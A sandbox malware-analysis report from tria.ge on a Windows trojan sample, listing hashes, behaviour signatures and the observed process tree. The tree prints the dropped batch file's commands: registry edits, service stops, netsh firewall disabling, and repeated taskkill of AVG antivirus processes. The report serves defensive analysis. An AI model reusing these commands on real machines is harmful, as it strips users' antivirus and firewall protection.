Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

3dadd87327...18.exe

windows7-x64

10

3dadd87327...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    12/07/2024, 14:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe

  • Size

    36KB

  • MD5

    3dadd87327e92b402f5d02952eb256cf

  • SHA1

    4dfc944c3cd1e1e7756b0975ce1212687848412b

  • SHA256

    42a03a01291ad18b2f57364b99fedf6ecbdf97ef25416f64556757a3fc2760f2

  • SHA512

    8451110acfb23cd19709a544e79e7e6d1b2207a7825cdd9d7067af01f5dd02a900275accdfe7f85daffa3bd2962a96d09b466b48d4f6acb8dc6fb969238d173f

  • SSDEEP

    768:82gpFmvbXimSBlWRVJqYOF6dXm3jI3bOmcO:+KiYAF65m3jMcO

Score
10/10
evasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Windows security bypass 2 TTPs 3 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Kills process with taskkill 24 IoCs
    evasion
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2AF.tmp\DESATIVAR ANTIVIRUS GERAL.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v AntiVirusDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2644
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v FirewallDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2764
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v UpdatesDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2116
      • C:\Windows\SysWOW64\net.exe
        net stop SharedAccess
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SharedAccess
          4⤵
            PID:2708
        • C:\Windows\SysWOW64\net.exe
          net stop wscsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop wscsvc
            4⤵
              PID:2812
          • C:\Windows\SysWOW64\sc.exe
            sc config wscsvc start= disabled
            3⤵
            • Launches sc.exe
            PID:2776
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall set opmode mode=disable
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3056
          • C:\Windows\SysWOW64\sc.exe
            sc config antivirservice start= disabled
            3⤵
            • Launches sc.exe
            PID:2640
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgcsrvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:584
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgemc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2800
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgrsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgchsvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2808
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgnsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgwdsvc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2908
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgcsrvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2568
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgemc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2196
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgrsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:620
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgchsvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgnsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2852
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgwdsvc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgcsrvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:764
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgemc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgrsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2412
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgchsvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgnsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2952
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgwdsvc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2052
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgcsrvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgemc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1440
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgrsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:408
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgchsvx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2300
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgnsx.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:944
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill -f -im avgwdsvc.exe /t
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:924

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\2AF.tmp\DESATIVAR ANTIVIRUS GERAL.bat
        Filesize

        1KB

        MD5

        5d8d11c356ba744b6954b9a5cb3a4618

        SHA1

        1eb904f7401929fcbdc7efbd9e33a674a7ccb17f

        SHA256

        7ca23f66dcef0342d305d6c186614739312df87f27c26233b11aac54406fbd21

        SHA512

        d8aa07044290308db09ca0c6bfa9d885f9ac16d3a6558a0cff84be609364833486f40a9ea25a2df347fa2d0c4ba4267a9e5fc37f733654314a212925675a5c58

        Download Submit